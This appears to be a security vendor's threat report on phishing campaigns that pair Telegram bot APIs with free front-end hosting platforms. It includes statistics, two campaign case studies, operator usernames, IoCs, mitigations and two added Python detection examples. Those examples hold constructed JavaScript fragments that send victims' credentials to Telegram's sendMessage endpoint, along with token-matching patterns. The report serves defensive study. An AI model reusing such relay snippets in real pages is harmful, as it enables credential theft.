Key Findings
- Analysis of 9,100 phishing domains that used Telegram bot APIs to relay stolen credentials.
- Abuse of front-end hosting platforms (FHPs):
- FHP abuse has grown steadily since early 2021.
- The number of unique domains leveraging both Telegram bot APIs and FHPs doubled from mid-June to mid-July 2025.
- Telegram operator artifacts:
- 4,145 unique Telegram bot tokens (API keys) were embedded in malicious pages.
- 28% of tokens are reused across multiple domains; some appeared across hundreds of domains in large-scale campaigns.
- 264 unique Telegram channel or group admin usernames were identified.
- 25% used more than one domain in their campaigns.
- Lure types (n=100 visually inspected pages, random sample):
- 50% presented generic login/webmail interfaces.
- 20% mimicked banking logins.
- 30% impersonated business services common in enterprise workflows (for example, WeTransfer, DocuSign).
- Tactics at scale:
- One campaign used a single FHP with multiple URL redirects.
- Another used multiple FHPs to host phishing pages in parallel.
Mitigation Recommendations
- Control Telegram usage. Detect and block Telegram communications, unless there is a documented business need to allow the Telegram APIs in the corporate environment.
- Monitor FHP traffic. Closely monitor and, where policy allows, restrict access to frequently-abused FHPs; alert on newly observed domains and suspicious referrer chains.
- Harden authentication. Enforce multi-factor authentication (MFA) whenever possible, especially for email, VPN, identity providers, and financial portals.
- Detect risky sign-ins. Alert on abnormal logins (unusual locations, off-hours access, repeated failures, abnormal travel) and require step-up verification.
Background
In earlier research, we showed how threat actors abuse domain names to distribute malware and highlighted a Zoom-themed campaign hosted on subdomains of front-end hosting platforms (FHPs) such as Surge.sh and Cloudflare’s pages.dev.
That finding prompted a broader look at FHP abuse. We uncovered a complementary trend: instead of leasing dedicated backend infrastructure (servers, IP space and their own domains), threat actors increasingly combine FHPs with Telegram to run phishing campaigns at scale and at near-zero cost.
Our analysis suggests the FHP-Telegram pairing has surged in popularity driven by factors such as:
- Low cost and automation on FHPs. Free or inexpensive tiers and CI/CD-style tooling let operators spin up new sites from templates onto user-specified or randomly generated subdomains, enabling rapid replication.
- Reputation shielding. Provider-owned domains and IP ranges often carry favorable reputation, helping phishing pages slip past domain- or hosting-based filters.
- Low-friction operator accounts. Telegram accounts can be created with only a phone number (for example, virtual numbers or prepaid SIMs) and automated via bot APIs.
- Persistence and convenience. Telegram’s bot ecosystem and hosting posture are frequently abused, offering attackers resilient channels to receive and store stolen credentials.
The result is a tightly-integrated pipeline for large-scale phishing, outlined at a high level in Figure 1.
Figure 1 – Overview of phishing campaigns abusing Telegram and FHPs
This convenience exposes a weakness: bot tokens and related metadata often appear in page source, which allows further analysis and clustering of campaigns.
In this report, we analyze 9,100 domains used in phishing campaigns that leverage Telegram bots (not all of them use FHPs) between April 2020 and August 2025. We quantify the recent rise in FHP abuse, describe how we identified and grouped thousands of campaigns, and conclude with practical risk mitigation guidance.
Phishing With Telegram – Analyzing Abused Domains and Autonomous Systems
The 9,100 domains in our dataset span 227 top-level domains (TLDs). Figure 2 charts the most common TLDs:
- Generic TLDs (gTLDs): 71% of domains. Traditional gTLDs, such as .com (27%), .net (3%) and .org (3%), remain heavily abused, likely because users tend to trust them. Beyond these, .app and .dev – commonly used by FHPs such as Vercel.app and Cloudflare Pages/R2 – together account for 20% of phishing domains.
- Country-code TLDs (ccTLDs): 29% of domains. The top 3 – .io (8%), .me (6%), and .sh (4%) – are widely associated with FHPs like github.io, glitch.me, and surge.sh (despite their official ties to the British Indian Ocean Territory, Montenegro, and Saint Helena, respectively). The first ccTLD not typically associated with FHPs in our data is .ru (2%).
Figure 2 – TLD distribution of domains abusing Telegram for phishing
Further evidence of FHP prevalence comes from the Autonomous Systems (AS) hosting IP addresses resolved from these domains.
Figure 3 – AS distribution of the domains abusing Telegram for phishing
Figure 3 lists the top ASes. Only 1.4% of phishing pages resolved to ASes that Spamhaus currently labels as malicious – unsurprising, since operators avoid providers on major blocklists. The more interesting finding is concentration: 47% of inspected phishing pages were hosted by the top three ASNs, which often underpin FHPs:
- CLOUDFLARENET (AS13335). Roughly a third of pages here were on Cloudflare Pages (pages.dev) or Cloudflare R2 public-bucket endpoints.
- FASTLY (AS54113). Most pages here mapped to Glitch.me (33%), GitHub (32%) and Firebase (12%) in our telemetry.
- AMAZON-02 (AS16509). A substantial share aligned to Vercel (57%) and Netlify (10%) in our dataset.
Figures 2 and 3 together indicate a strong FHP footprint in Telegram-enabled phishing. Next, we examine how this has grown over time.
Increase in Phishing Abusing Telegram and FHPs
Figure 4 shows that, after excluding subdomains and counting each base domain (eTLD+1) only once, about half of the domains were registered within the past two years, evidence of accelerating phishing activity.
Figure 4 – Registration-date distribution of the analyzed domains (eTLD+1)
Not all growth is FHP-driven. We also observed:
- A 2012-2016 registration spike that aligns with ICANN’s new gTLD program, which expanded the available gTLDs.
- 314 domains registered between 2000 and 2010. The vast majority appear to be compromised legitimate sites or post-expiration takeovers (re-registered domains leveraging inherited reputation).
- 120 domains registered before 2000. These often appear in redirect chains that route victims from legitimate services to malicious pages, using platforms such as Google services (e.g. Travel, as shown in the figure below), Blogspot, DoubleClick, and local hosting providers’ servers such as nazwa.pl.
Figure 5 groups FHP usage by submission date and shows that Telegram has been exploited to relay phished credentials since early 2020, with adoption rates rising over time. Key takeaways:
- FHP abuse has grown steadily since early 2021. The share of malicious domains from the six most frequent platforms more than tripled from 5.3% (2023) to 16.3% (2025).
- The number of unique domains using both Telegram bot APIs and FHPs doubled from mid-June to mid-July 2025.
Figure 5 – Overview of front-end hosting platforms detected in our dataset
Operators may select specific FHPs based on response times to abuse reports, automation features, and cost. In URLs submitted to URLQuery, Vercel, Glitch, and GitHub accounted for most malicious sites in our sample. From early July 2025, Glitch and GitHub lost momentum in favor of Surge. Notably, Glitch ended web hosting on July 8, 2025, citing increased costs and misuse by bad actors, which likely contributed to this shift.
Identifying and Clustering Campaigns
Because Telegram-enabled phishing on FHPs is rising, we outline practical ways to identify and cluster related activity for threat-intel purposes.
On-page indicators we use to cluster campaigns
Phishing pages that leverage Telegram typically embed two or three artefacts that allow reliable grouping:
- Recipient chats (channels, groups, supergroups, or private accounts) used to receive stolen data.
- Telegram bot tokens (API keys) used to authenticate and send messages to those recipients.
- Admin usernames for channels, groups, and supergroups, when exposed.
Clustering domains by bot token (primary) or admin username (secondary) reveals single campaigns spread across many domains and FHPs.
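The clustering step described above, as an added example that is not code from the report or from Forescout: it pulls the relay artefacts out of page source and groups domains by bot token (primary key) and by recipient chat_id (secondary key, since that is what the relay call itself carries; admin usernames need a separate lookup that this offline example does not perform). The page fragments are constructed, and the token regex assumes the usual `<numeric bot id>:<35-character secret>` layout.

```python
"""Extract Telegram relay artefacts from phishing-page source and cluster
domains by bot token and recipient chat_id. All page fragments below are
constructed for this example."""
import re
from collections import defaultdict

# Assumed token shape: 8-10 digit bot id, colon, 35-char secret. No leading \b,
# because the token usually follows ".../bot" with no word boundary in between.
TOKEN_RE = re.compile(r"(?<!\d)\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")
# Bot API method name when the call is written out literally: /bot<token>/<method>
METHOD_RE = re.compile(r"api\.telegram\.org/bot\d{8,10}:[A-Za-z0-9_-]{35}/(\w+)")
# chat_id as a JS object key, form field or query parameter (channels use negative ids);
# up to four punctuation/space characters are allowed between the key and the value.
CHAT_ID_RE = re.compile(r"chat_id\W{0,4}(-?\d{5,})")

# Constructed tokens (valid shape, not real credentials)
TOKEN_A = "1234567890:AAEconstructedTOKENsecretpart_00011"
TOKEN_B = "9876543210:AAFanotherCONSTRUCTEDsecretvalue_02"

# Constructed page-source fragments keyed by the hosting domain
SAMPLE_PAGES = {
    "login-verify.vercel.app":
        'fetch("https://api.telegram.org/bot' + TOKEN_A + '/sendMessage", '
        '{method: "POST", body: JSON.stringify({chat_id: "5551234567", text: creds})});',
    "secure-docs.pages.dev":
        '$.post("https://api.telegram.org/bot' + TOKEN_A + '/sendMessage", '
        '{chat_id: 5551234567, text: document.forms[0].email});',
    # Token and URL are concatenated at runtime: the token regex still finds it,
    # but METHOD_RE and CHAT_ID_RE do not, which is a known limitation of static grep.
    "mailbox-update.github.io":
        'var token = "' + TOKEN_B + '"; var chat = "-1001234567890";\n'
        'fetch("https://api.telegram.org/bot" + token + "/sendDocument", {body: fd});',
    "news.example-corp.test": "<html><body>No relay code on this page</body></html>",
}


def extract_artifacts(source):
    """Return the tokens, API methods and chat_ids visible in one page's source."""
    return {
        "tokens": set(TOKEN_RE.findall(source)),
        "methods": set(METHOD_RE.findall(source)),
        "chat_ids": set(CHAT_ID_RE.findall(source)),
    }


def cluster(pages):
    """Map every token and every chat_id to the sorted list of domains using it."""
    by_token, by_chat = defaultdict(set), defaultdict(set)
    for domain, source in pages.items():
        art = extract_artifacts(source)
        for token in art["tokens"]:
            by_token[token].add(domain)
        for chat in art["chat_ids"]:
            by_chat[chat].add(domain)
    return ({t: sorted(d) for t, d in by_token.items()},
            {c: sorted(d) for c, d in by_chat.items()})


def reused(index, min_domains=2):
    """Keep only keys shared by at least min_domains domains (one campaign, many sites)."""
    return {k: v for k, v in index.items() if len(v) >= min_domains}


if __name__ == "__main__":
    by_token, by_chat = cluster(SAMPLE_PAGES)
    for token, domains in reused(by_token).items():
        # Print only the bot id: the secret half of the token should not land in reports
        print(f"bot {token.split(':')[0]} reused on {len(domains)} domains: {domains}")
    for chat, domains in reused(by_chat).items():
        print(f"chat_id {chat} receives data from: {domains}")
```

When run against real page captures, feed the token index into the eTLD+1 grouping described later in the report; a token shared across several FHP subdomains is the strongest single signal that those pages belong to one operator.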
Token reuse across domains
We extracted 4,145 unique bot tokens. Figure 6 shows 1,170 tokens (28%) were reused across multiple domains:
- 26% were reused across 2-10 domains
- 2% were reused across 11+ domains
Figure 6 – Telegram bot tokens by number of associated domains
Chat types and administrators
Most recipient chats we observed were private accounts, but we also identified 419 groups, 143 supergroups and 59 channels. Where available, we captured admin usernames and participant counts:
- Most chats were small (1-2 participants), with exceptions, including:
- 517 chats with 3-10 participants.
- 13 chats with 11+ participants.
- We observed 264 unique admin usernames.
- 197 (75%) appeared in only one domain.
- Several admins operated dozens of domains (see table below).
- The same admins sometimes used different bot tokens across different domains.
Admins operating the most domains
| Username | Display name | Domains | Comments |
|---|---|---|---|
| Tigerok3001 | Tiger OK | 79 | Prior campaign reporting ties this handle to >400 pages targeting Meta business accounts. Most pages on Vercel.app, some on Netlify.app with random naming. |
| Minion631 | Minion | 42 | All on Vercel.app. Frequent terms include submit-verification-documents and trusted-verification-service. |
| sxxhhw2 | Đào Hải | 35 | Vietnamese display name. All on Vercel.app with random names. Possibly related to tigerok3001 based on language and similar aliases (e.g. “vlxx12312”). |
| kindy456 | ℂ𝕠𝕞𝕓𝕒𝕔𝕜 | 10 | All on Vercel.app; names reference Meta/Facebook (for example metasupport119.vercel[.]app and facebook146.vercel[.]app). |
| KingZinnizzi | KingZinni | 8 | All on Vercel.app; domains allude to a hotel chain. |
Campaigns using the most simultaneous domains (API-key clustering)
| Campaign identifier | Number of domains | Description |
|---|---|---|
| 1 | 104 | Cryptocurrency air-drop scam. Pages advertise new cryptocurrencies and victims provide wallet data supposedly to allow a free deposit of the new currency. |
| 2 | 85 | Impersonation of an events ticketing site in Kuwait. |
| 3 | 76 | Phishing pages impersonating a French financial institution. This campaign abused a less frequent FHP (pantheonsite.io) in ~85% of domains. |
| 4 | 75 | Alleged Booking.com reward program. |
| 5 | 71 | Fake Meta reporting about Facebook page deactivation for copyright; hosted on vercel.app. |
| 6 | 48 | Multiple cryptocurrency air-drop impersonations; hosted on vercel.app. |
These campaigns appear opportunistic, aimed at profiles such as cryptocurrency enthusiasts, customers of specific institutions like the French bank, or Facebook page admins – not at individual enterprises.
Targeting from a random visual sample (n=100 sites)
From 100 randomly selected sites we visually inspected:
- 50% used generic login/webmail lures.
- 20% mimicked banking logins.
- 30% impersonated enterprise services (for example WeTransfer, DocuSign).
Below, we detail two targeted campaigns. Notably, even “targeted” runs often rely on generic templates, rather than faithful clones of corporate applications.
Campaign Examples
Case 1 – Using One FHP and Multiple URL Redirects
Between January 17 and February 14, we detected ten malicious links abusing redirects from lcpush.lottecard.co[.]kr (a legitimate Korean credit card provider). These links routed victims to subdomains such as:
hxxps://Signufarma.istapeyman[.]ir/<redacted_email_address>
hxxps://Aventicum.istapeyman[.]ir/<redacted_email_address>
hxxps://Ecovadis.istapeyman[.]ir/<redacted_email_address>
hxxps://Thermotek.istapeyman[.]ir/<redacted_email_address>
The parent domain istapeyman[.]ir belongs to a legitimate Iranian manufacturer. The listed subdomains were likely hijacked; they reference other organizations by name (for example Signufarma, Aventicum, EcoVadis, and Intertek) and the redacted path fragments included the names of real people in senior roles at those organizations. Those subdomains then redirected users to Amazon S3 buckets:
prince-approve.s3.us-east-2.amazonaws[.]com
encryptedfile-receipt-mon.s3.us-east-2.amazonaws[.]com
accessadmin-filereview-thurs.s3.us-east-2.amazonaws[.]com
frival.s3.us-east-1.amazonaws[.]com
The S3 pages posed as parked/placeholder pages for unassigned domains (shown below) and contained e-mail login forms. Entered credentials were exfiltrated to Telegram.
The relay code was a JavaScript file hosted via an IPFS gateway: bafkreih35lw4grtr7sipsf6kuqjrxu5ladnrc4m7zndvzyncny7tlkvure.ipfs.flk-ipfs[.]xyz.
Stolen credentials were sent to a private chat operated by the username newplanner7bot.
Pivoting from these indicators, we found additional targeted organizations in manufacturing, oil and gas, and law across multiple emerging-market countries.
Case 2 – Using Multiple FHPs
On April 30, the domain m3y33.preview.codesignal[.]com was observed hosting a DocuSign look-alike login page, as shown below.
As in Case 1, submitted credentials were forwarded to Telegram. In this campaign, the same Telegram bot token was reused across ten other domains, eight of which were hosted on FHPs including Vercel, GitHub, Netlify and Cloudflare. Those domains redirected users to three Replit pages:
282e6099-1df3-4787-8cf7-59508894f6be-00-1cone31uhkga3.sisko.replit[.]dev
0ff638fc-e17b-4709-9e72-c787b2a98a1f-00-20tq7jznm9ozf.pike.replit[.]dev
fe6b341c-0131-4185-9b97-40964b3abc5b-00-132d0deoi1w3j.sisko.replit[.]dev
Across these domains we saw heterogeneous lures: Meta violation notices, Microsoft account logins, online banking pages, company-branded job application forms, and WeTransfer/DocuSign impersonations.
From 2,600 distinct victims whose data was relayed via Telegram, the largest share (33%) belonged to Italian research institutions, including the National Research Center (CNR) and several universities. Many victims worked in biotechnology, biochemistry, and food technology departments. Additional targets included research institutions in France and Greece (molecular biology and genetics), and the Bosnia and Herzegovina Air Navigation Services Agency.
Mitigation Recommendations
In our previous research on domain abuse for malware distribution, we outlined controls that also reduce phishing risk:
- Detect and prevent communications with malicious domains:
- Educate and enable reporting. Train customers and employees about domain name abuse and how to spot risky domains (randomness/DGA-like strings, suspicious TLDs, typosquats and abusive subdomains), and to report them through a simple tracked workflow integrated with SOC tooling.
- Enforce DNS egress policy. Route all queries through enterprise resolvers; block direct use of external resolvers and unmanaged DNS over HTTPS (DoH) or DNS over TLS (DoT).
- Filter at the resolver. Use resolvers with DNS abuse filtering and support for policies such as Response Policy Zones (RPZ) or equivalent deny/allow lists (for example, Quad9 or commercial alternatives).
- Detect on network and endpoint. Use NDR/IDS and EDR to flag and block outbound DNS, SNI, and Host header requests to known-malicious or newly observed domains.
- Apply age and reputation controls. Treat newly registered domains and newly observed domains as higher risk; alert or quarantine until vetted.
- Centralize telemetry. Send DNS logs to the SIEM, enrich with WHOIS, passive DNS, and certificate transparency data to track domain age, eTLD+1 (the registrable base domain) groupings, and reuse across campaigns.
This study highlights that many modern phishing campaigns rely on Telegram bots and front-end hosting platforms (FHPs), so we add the following:
- Control Telegram usage. Detect and block Telegram communications unless there is a documented business need. Focus on the Telegram Bot API pattern (e.g. api.telegram.org/bot/sendMessage), plus related endpoints (file uploads, getUpdates). Where business use is allowed, allowlist sanctioned bots and destinations, log all access, and alert on token exposure in page source.
- Monitor FHP traffic. Closely monitor and, where policy allows, restrict access to frequently-abused FHPs; alert on newly observed domains and suspicious referrer chains. In our data, frequently abused FHP domains included: pages.dev, web.app, vercel.app, mybluehost.me, netlify.app, codeanyapp.com, glitch.me, github.io, surge.sh, r2.dev
- Harden authentication. Enforce multi-factor authentication (MFA) whenever possible, especially for email, VPN, identity providers, and financial portals.
- Detect risky sign-ins. Alert on abnormal logins (unusual locations, off-hours access, repeated failures, abnormal travel) and require step-up verification.
- Kill bad sessions rapidly. Block or invalidate sessions initiated from suspicious logins; force password resets where warranted.
- Report abuse. Use provider abuse channels (FHPs, Telegram) to accelerate takedown; include IOCs and evidence, such as bot-token strings and referrer chains.
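The first two controls in this list (Telegram Bot API allowlisting and FHP traffic monitoring), worked through as an added example that is not code from the report or from Forescout. It runs three rules over constructed web-proxy log lines: a Bot API call whose token is not on the sanctioned allowlist, a first-seen host under one of the FHP domains the report lists, and an FHP page reached with a referrer from an unrelated site (the redirect-chain pattern in the campaign examples). The log format, the sample lines, the allowlist and both tokens are constructed; the FHP domain list is the report's.

```python
"""Triage constructed proxy log lines for Telegram-relay and FHP indicators.
Log format (constructed): tab-separated timestamp, client IP, HTTP method, URL,
referrer ("-" when absent)."""
import re
from urllib.parse import urlparse

# Assumed token shape: 8-10 digit bot id, colon, 35-char secret
BOT_CALL_RE = re.compile(r"^/bot(\d{8,10}:[A-Za-z0-9_-]{35})/(\w+)")

# Frequently abused FHP domains listed in the report (eTLD+1 of the hosting platform)
ABUSED_FHPS = ("pages.dev", "web.app", "vercel.app", "mybluehost.me", "netlify.app",
               "codeanyapp.com", "glitch.me", "github.io", "surge.sh", "r2.dev")

# Hypothetical allowlist of sanctioned bot tokens; in practice loaded from config
SANCTIONED_BOTS = {"1111111111:AAGsanctionedALERTINGbotForNOC_team"}
UNSANCTIONED = "2222222222:AAHphishKITrelayTOKENconstructed_07"  # constructed

# Constructed log lines: one client walks redirect -> FHP page -> Telegram relay
SAMPLE_LOG = [
    "\t".join(("2025-07-10T09:12:01Z", "10.0.5.21", "GET",
               "https://docs-review.vercel.app/index.html",
               "https://redirect.legit-partner.test/go")),
    "\t".join(("2025-07-10T09:12:02Z", "10.0.5.21", "GET",
               "https://static.docs-review.vercel.app/app.js",
               "https://docs-review.vercel.app/index.html")),
    "\t".join(("2025-07-10T09:12:03Z", "10.0.5.21", "POST",
               f"https://api.telegram.org/bot{UNSANCTIONED}/sendMessage",
               "https://docs-review.vercel.app/index.html")),
    "\t".join(("2025-07-10T09:15:40Z", "10.0.7.4", "POST",
               f"https://api.telegram.org/bot{next(iter(SANCTIONED_BOTS))}/sendMessage",
               "-")),
    "\t".join(("2025-07-10T09:16:12Z", "10.0.9.9", "GET",
               "https://www.example-corp.test/login", "-")),
]


def fhp_of(host):
    """Return the abused-FHP base domain that host sits under, or None."""
    for fhp in ABUSED_FHPS:
        if host == fhp or host.endswith("." + fhp):
            return fhp
    return None


def triage(lines, sanctioned=SANCTIONED_BOTS, known_hosts=()):
    """Return a list of alert dicts; known_hosts are FHP hosts already vetted."""
    seen = set(known_hosts)
    alerts = []
    for line in lines:
        ts, client, method, url, referrer = line.split("\t")
        parsed = urlparse(url)
        host = parsed.hostname or ""
        # Rule 1: Bot API call with a token outside the sanctioned allowlist.
        # Record only the bot id so the secret half never lands in the SIEM.
        if host == "api.telegram.org":
            match = BOT_CALL_RE.match(parsed.path)
            if match and match.group(1) not in sanctioned:
                alerts.append({"ts": ts, "client": client,
                               "kind": "unsanctioned_telegram_bot",
                               "detail": f"{match.group(2)} bot_id={match.group(1).split(':')[0]}"})
            continue
        fhp = fhp_of(host)
        if not fhp:
            continue
        # Rule 2: first sighting of a host under an abused FHP
        if host not in seen:
            seen.add(host)
            alerts.append({"ts": ts, "client": client, "kind": "new_fhp_host", "detail": host})
        # Rule 3: FHP page reached via a referrer that is not on the same platform
        ref_host = urlparse(referrer).hostname if referrer != "-" else None
        if ref_host and fhp_of(ref_host) != fhp:
            alerts.append({"ts": ts, "client": client, "kind": "fhp_referrer_chain",
                           "detail": f"{ref_host} -> {host}"})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(alert["ts"], alert["client"], alert["kind"], alert["detail"])
```

Rule 2 is deliberately noisy on a first run; seed `known_hosts` with the FHP hosts the business already uses so only genuinely new subdomains alert, and correlate rule 3 with rule 1 on the same client within a short window to prioritise the full redirect-to-relay chain over isolated hits.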
IoCs
Handle IoCs only in a controlled analysis environment. The full, continuously updated list is available on the Forescout Research – Vedere Labs threat feed. The items below are those explicitly mentioned in this report:
istapeyman[.]ir
prince-approve.s3.us-east-2.amazonaws[.]com
encryptedfile-receipt-mon.s3.us-east-2.amazonaws[.]com
accessadmin-filereview-thurs.s3.us-east-2.amazonaws[.]com
s3.us-east-1.amazonaws[.]com
ipfs.flk-ipfs[.]xyz
preview.codesignal[.]com
282e6099-1df3-4787-8cf7-59508894f6be-00-1cone31uhkga3.sisko.replit[.]dev
0ff638fc-e17b-4709-9e72-c787b2a98a1f-00-20tq7jznm9ozf.pike.replit[.]dev
fe6b341c-0131-4185-9b97-40964b3abc5b-00-132d0deoi1w3j.sisko.replit[.]dev